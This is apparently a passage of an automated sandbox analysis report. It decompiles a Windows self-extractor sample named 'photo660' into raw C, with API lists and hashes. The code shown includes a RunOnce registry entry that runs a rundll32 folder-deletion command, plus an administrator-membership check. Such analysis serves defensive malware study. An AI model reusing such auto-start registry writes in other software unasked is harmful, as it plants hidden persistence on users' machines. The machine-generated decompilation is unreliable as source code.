                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "photo660", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc464c
                                                                                                                                                                                                        0x00bc4666
                                                                                                                                                                                                        0x00bc466d
                                                                                                                                                                                                        0x00bc466f
                                                                                                                                                                                                        0x00bc4675
                                                                                                                                                                                                        0x00bc4675
                                                                                                                                                                                                        0x00bc45ad
                                                                                                                                                                                                        0x00bc4527
                                                                                                                                                                                                        0x00bc452e
                                                                                                                                                                                                        0x00bc453f
                                                                                                                                                                                                        0x00bc453f
                                                                                                                                                                                                        0x00bc4530
                                                                                                                                                                                                        0x00bc4531
                                                                                                                                                                                                        0x00bc4538
                                                                                                                                                                                                        0x00bc453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc453d
                                                                                                                                                                                                        0x00bc4554
                                                                                                                                                                                                        0x00bc455a
                                                                                                                                                                                                        0x00bc455a
                                                                                                                                                                                                        0x00bc455a
                                                                                                                                                                                                        0x00bc4525
                                                                                                                                                                                                        0x00bc468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00BC45A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00BC45E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00BC460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00BC4630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,photo660,00000000), ref: 00BC4666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00BC466F
                                                                                                                                                                                                          • Part of subcall function 00BC681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00BC686E
                                                                                                                                                                                                          • Part of subcall function 00BC681F: GetSystemMetrics.USER32(0000004A), ref: 00BC68A7
                                                                                                                                                                                                          • Part of subcall function 00BC681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00BC68CC
                                                                                                                                                                                                          • Part of subcall function 00BC681F: RegQueryValueExA.ADVAPI32(?,00BC1140,00000000,?,?,0000000C), ref: 00BC68F4
                                                                                                                                                                                                          • Part of subcall function 00BC681F: RegCloseKey.ADVAPI32(?), ref: 00BC6902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$photo660
                                                                                                                                                                                                        • API String ID: 3244514340-1652614573
                                                                                                                                                                                                        • Opcode ID: 28409bfa97b01fdf31dd3b4dbee1564dbb511fe3ae7b49d791ac81efb82eb666
                                                                                                                                                                                                        • Instruction ID: 7a568ea70bb2ff133e683f220207a4ec08ceb50276b19582f780f16d9bf563ac
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28409bfa97b01fdf31dd3b4dbee1564dbb511fe3ae7b49d791ac81efb82eb666
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C551D272900219ABDB219F28CC58FAA7BE9EF4A304F1445E9FD49B7245DB31DE05CB60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E00BC1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E00BC658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E00BC658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0xbc1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E00BC1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(9F7D84CA,00000000,00000000,00000000), ref: 00BC27A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 00BC27B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00BC27BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00BC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC2870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00BC28A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00BC28AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC28B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00BC27E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: ddf0b68db5bc01336574cf5beec5b4a12c064ee6901ca69095d426771ae98f92
                                                                                                                                                                                                        • Instruction ID: 23d76105c2efd06fb2278b35f226a90e56fbf50af8859ce4e9463bd6e90be633
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddf0b68db5bc01336574cf5beec5b4a12c064ee6901ca69095d426771ae98f92
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77417E71A0012CAFDB249B649C85FEA7BFDEF5A740F1440E9E549E2111DB708E868BA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00BC2267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0xbc8530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E00BC658A( &_v268, 0x104, 0xbc1140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        							E00BC171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00BC22A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00BC22D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC22F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC2305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00BC236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BC237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • wextract_cleanup2, xrefs: 00BC227C, 00BC22CD, 00BC2363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00BC2299
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00BC232D
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00BC2321
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
• Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 3027380567-2274915764
                                                                                                                                                                                                        • Opcode ID: c95e9242cc74dd4df221635fda105a7147eef18e3e2059808fe9768b79744d02
                                                                                                                                                                                                        • Instruction ID: 4695b1d111742331477e7c44a9be416b4b8b03447e731c712ec630d4cde72de5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c95e9242cc74dd4df221635fda105a7147eef18e3e2059808fe9768b79744d02
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C31C371A00218ABDB219B65DC49FEB7BBCEB59744F0401EDB50DA6051EE70AF88CA60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00BC3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0xbc8590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0xbc8590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E00BC43D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xbc8d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "photo660");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0xbc88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00BC30C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00BC313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00BC316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00BC3176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00BC317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 00BC3185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00BC3190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00BC30C0), ref: 00BC31A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00BC31CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 3785188418-1757243477
                                                                                                                                                                                                        • Opcode ID: e9b1965c179a3e3eb5f2a00d67374fa0ae5916c2e7e8543e72141fcab22695cc
                                                                                                                                                                                                        • Instruction ID: dadae413ccd7ddacb9b2dc4656505e0d3424f76c050f82127b493e37e4c0dc8c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9b1965c179a3e3eb5f2a00d67374fa0ae5916c2e7e8543e72141fcab22695cc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2311B431204225BFDB115F24AC0CF9A3AE4EB4EB24F588658F915B61E0DFB58A41D786
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E00BC18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0xbc8128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E00BC6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00BC17EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0xbc8128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xbc8128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00BC18DD), ref: 00BC181A
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00BC182C
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: AllocateAndInitializeSid.ADVAPI32(00BC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BC18DD), ref: 00BC1855
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: FreeSid.ADVAPI32(?,?,?,?,00BC18DD), ref: 00BC1883
                                                                                                                                                                                                          • Part of subcall function 00BC17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00BC18DD), ref: 00BC188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00BC18EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00BC18F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00BC190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BC1918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00BC192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00BC1944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BC1964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00BC197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00BC199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00BC19A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00BC19AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
• Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
